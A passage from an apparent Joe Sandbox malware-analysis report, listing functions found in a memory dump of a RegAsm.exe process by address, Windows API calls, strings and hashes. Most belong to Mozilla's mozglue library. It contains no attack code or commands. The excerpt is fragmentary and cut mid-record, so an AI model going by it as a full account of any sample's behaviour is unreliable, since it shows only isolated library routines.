                                                                                                                                                        • Opcode ID: 1f22cb9e14de4fd154e323303344edf48b0cd2d600f59deacc8df82384c85cab
                                                                                                                                                        • Instruction ID: e9c54e21a85619670ec84b10d4a2980a79a5cedfb79f04fff76ce72d15e37143
                                                                                                                                                        • Opcode Fuzzy Hash: 1f22cb9e14de4fd154e323303344edf48b0cd2d600f59deacc8df82384c85cab
                                                                                                                                                        • Instruction Fuzzy Hash: 24119475202604BFCB04AF5AD9889D57779FF87358F508016EA0683F02CB71A825CBBE
                                                                                                                                                        Function 6C6676C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C6676F2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001), ref: 6C667705
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C667717
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C66778F,00000000,00000000,00000000,00000000), ref: 6C667731
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C667760
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID: }>dl
                                                                                                                                                        • API String ID: 2538299546-3547458583
                                                                                                                                                        • Opcode ID: bf3ce814bec1e96ec8bb924860b7fa3fc28795f9688412a7e339572d10c15392
                                                                                                                                                        • Instruction ID: bac569d5c1e4a6e3ad3d29cc1125d4beefec48cc044366c82451e7606e28fecb
                                                                                                                                                        • Opcode Fuzzy Hash: bf3ce814bec1e96ec8bb924860b7fa3fc28795f9688412a7e339572d10c15392
                                                                                                                                                        • Instruction Fuzzy Hash: 0A11B2B19052156BE720AF7A9C44BABBFE8EF46354F144529F888A7700E77089448BE6
                                                                                                                                                        Function 6C610EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C63D9F0,00000000), ref: 6C610F1D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C610F3C
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C610F50
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C63D9F0,00000000), ref: 6C610F86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                        • String ID: CoInitializeEx$combase.dll
                                                                                                                                                        • API String ID: 4190559335-2063391169
                                                                                                                                                        • Opcode ID: 55695b8eace62e97c07e8c33f39df5ca15d16196db7f63840010aebba92c1635
                                                                                                                                                        • Instruction ID: a4e78cf7d50bb492114f10c447e83c7e9c37083acb1698ea5ea692450833c822
                                                                                                                                                        • Opcode Fuzzy Hash: 55695b8eace62e97c07e8c33f39df5ca15d16196db7f63840010aebba92c1635
                                                                                                                                                        • Instruction Fuzzy Hash: EE11707470B241BFDF00CF6AC989A463778EB9F326F104629ED0592A81D732A415CA7F
                                                                                                                                                        Function 6C64F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F559
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F561
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F585
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F5A3
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6C64F239
                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C64F3A8
                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C64F499
                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C64F56A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                        • API String ID: 2848912005-2840072211
                                                                                                                                                        • Opcode ID: 4fbe33c7df9330c8d1ba9c449bf7aaa52a6a79beb8e4dea5282ec282e4bc216e
                                                                                                                                                        • Instruction ID: 299e412e6752cee7ce8d84d0c2dca1dc0fa8dec070bb755b100c688f6d05596a
                                                                                                                                                        • Opcode Fuzzy Hash: 4fbe33c7df9330c8d1ba9c449bf7aaa52a6a79beb8e4dea5282ec282e4bc216e
                                                                                                                                                        • Instruction Fuzzy Hash: E4F05475602204BFDB006F66DC8CA5A77BDEFC729DF108416EA0583702DB754805877E
                                                                                                                                                        Function 6C610E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C610DF8), ref: 6C610E82
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C610EA1
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C610EB5
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C610EC5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                        • API String ID: 391052410-1680159014
                                                                                                                                                        • Opcode ID: ef57bd8b4adcfcffb31c3835d9935cd0d8880a727bba55f40693533d5270c207
                                                                                                                                                        • Instruction ID: 257ff2f1e3c19ba61ed5738e01606edc0f4708892b6a11585c24fadb50c4f1b0
                                                                                                                                                        • Opcode Fuzzy Hash: ef57bd8b4adcfcffb31c3835d9935cd0d8880a727bba55f40693533d5270c207
                                                                                                                                                        • Instruction Fuzzy Hash: AE012874706381EBFF008FEAE898A4237B5F74B31AF100525EA1582F40D774A4268A3E
                                                                                                                                                        Function 6C64F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F619
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C64F598), ref: 6C64F621
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F637
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F645
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F663
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C64F62A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                        • API String ID: 2848912005-753366533
                                                                                                                                                        • Opcode ID: 978ec18988a54d76f7071d26ee47c4f194dc0e2b474cfb3345b58c91bc47da04
                                                                                                                                                        • Instruction ID: 471d36e22294a7e4e86a362624db8f81819a2d46e0956f5c2243e6a66d1cdf5e
                                                                                                                                                        • Opcode Fuzzy Hash: 978ec18988a54d76f7071d26ee47c4f194dc0e2b474cfb3345b58c91bc47da04
                                                                                                                                                        • Instruction Fuzzy Hash: C0F05475202204BFDB006F66DC8CA5A77BDEFC729DF108416EA0583742CB754806877E
                                                                                                                                                        Function 6C6405F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C63CFAE,?,?,?,6C6031A7), ref: 6C6405FB
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C63CFAE,?,?,?,6C6031A7), ref: 6C640616
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6031A7), ref: 6C64061C
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6031A7), ref: 6C640627
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _writestrlen
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 2723441310-2186867486
                                                                                                                                                        • Opcode ID: f543f7d41950fba270d49813c072e56deba86ff6cee392d304b9cbb500f86061
                                                                                                                                                        • Instruction ID: 20ee4db8988203cb62151ef7f52469b5252300f3de5d98da880795959e8d638a
                                                                                                                                                        • Opcode Fuzzy Hash: f543f7d41950fba270d49813c072e56deba86ff6cee392d304b9cbb500f86061
                                                                                                                                                        • Instruction Fuzzy Hash: A1E08CE2A0201037F6242266AC86DBB761CDBC7134F080139FE0E83701E94AAD1A51FA
                                                                                                                                                        Function 6C6105F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: db60cbf029bc8c4f920bd4958331c21c1f29cba17233b24c2e02e92d1f3a6aef
                                                                                                                                                        • Instruction ID: cd403344108bb5d96605187538866063ebe71f3bbdf9242ae69e6606990bb7fe
                                                                                                                                                        • Opcode Fuzzy Hash: db60cbf029bc8c4f920bd4958331c21c1f29cba17233b24c2e02e92d1f3a6aef
                                                                                                                                                        • Instruction Fuzzy Hash: A5A168B0A05645CFDB24CF29C984A9AFBF1BF89304F44866ED44A97B00E730A955CFA4
                                                                                                                                                        Function 6C6614A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6614C5
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6614E2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C661546
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C6615BA
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C6616B4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1909280232-0
                                                                                                                                                        • Opcode ID: 39459e88d5d91cb477f1f07b1d80549bbf3cd19950d38c981125bdbc1b32c53e
                                                                                                                                                        • Instruction ID: 6f5a4cfee2cc56c2d04a70c3346e4e87428292b3f17bf458d01693acb669903a
                                                                                                                                                        • Opcode Fuzzy Hash: 39459e88d5d91cb477f1f07b1d80549bbf3cd19950d38c981125bdbc1b32c53e
                                                                                                                                                        • Instruction Fuzzy Hash: 5B610575A007409FDB218F21C880BDEB7B0BF8A308F44851DED8A57701DB31E959CB9A
                                                                                                                                                        Function 6C65DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65DC60
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C65D38A,?), ref: 6C65DC6F
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C65D38A,?), ref: 6C65DCC1
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C65D38A,?), ref: 6C65DCE9
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C65D38A,?), ref: 6C65DD05
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C65D38A,?), ref: 6C65DD4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1842996449-0
                                                                                                                                                        • Opcode ID: f464c3731e1a9fc768bb1c964c1705eb7eeea6234cbab64b22fdfa90ef1218e7
                                                                                                                                                        • Instruction ID: 61b3732b33441b20fce6ca9aa895143bce05e40f0e0f2aec2410aca1e73c9778
                                                                                                                                                        • Opcode Fuzzy Hash: f464c3731e1a9fc768bb1c964c1705eb7eeea6234cbab64b22fdfa90ef1218e7
                                                                                                                                                        • Instruction Fuzzy Hash: 56418BB5A00205DFCB10CFA9C98099AB7F5FF89314BA54569DA45ABB10E771FC10CFA8
                                                                                                                                                        Function 6C63F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C63F480
                                                                                                                                                          • Part of subcall function 6C60F100: LoadLibraryW.KERNEL32(shell32,?,6C67D020), ref: 6C60F122
                                                                                                                                                          • Part of subcall function 6C60F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C60F132
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C63F555
                                                                                                                                                          • Part of subcall function 6C6114B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C611248,6C611248,?), ref: 6C6114C9
                                                                                                                                                          • Part of subcall function 6C6114B0: memcpy.VCRUNTIME140(?,6C611248,00000000,?,6C611248,?), ref: 6C6114EF
                                                                                                                                                          • Part of subcall function 6C60EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C60EEE3
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C63F4FD
                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C63F523
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                        • String ID: \oleacc.dll
                                                                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                                                                        • Opcode ID: 55359ff13479587984373766e66303a41dcaca0b17adb3cae0733231aba31543
                                                                                                                                                        • Instruction ID: 0e38c1369b3941a3b522713580f1451315251aae95e7dfd0c55e3c4fdadf8bcf
                                                                                                                                                        • Opcode Fuzzy Hash: 55359ff13479587984373766e66303a41dcaca0b17adb3cae0733231aba31543
                                                                                                                                                        • Instruction Fuzzy Hash: AA41C3706087209FE720DF29C884A9BB3F4AF95328F106A5CF59593650EB70D549CBAA
                                                                                                                                                        Function 6C6674A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C667526
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C667566
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C667597
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                                                                        • Opcode ID: 0458233aebeaa584cc0571a68b6fbe4ca2bc0363e04d96fd02defbacc185a85e
                                                                                                                                                        • Instruction ID: 9ddc0d7370140a07b34e5fa3e6ade4b5e9a7bcb92687a16dcd1be7858a397535
                                                                                                                                                        • Opcode Fuzzy Hash: 0458233aebeaa584cc0571a68b6fbe4ca2bc0363e04d96fd02defbacc185a85e
                                                                                                                                                        • Instruction Fuzzy Hash: 77210731702551ABEF14CFEBD898E993375EB8B329F104568D50687F80CB31A8018ABF
                                                                                                                                                        Function 6C66C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C66C0E9), ref: 6C66C418
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C66C437
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C66C0E9), ref: 6C66C44C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
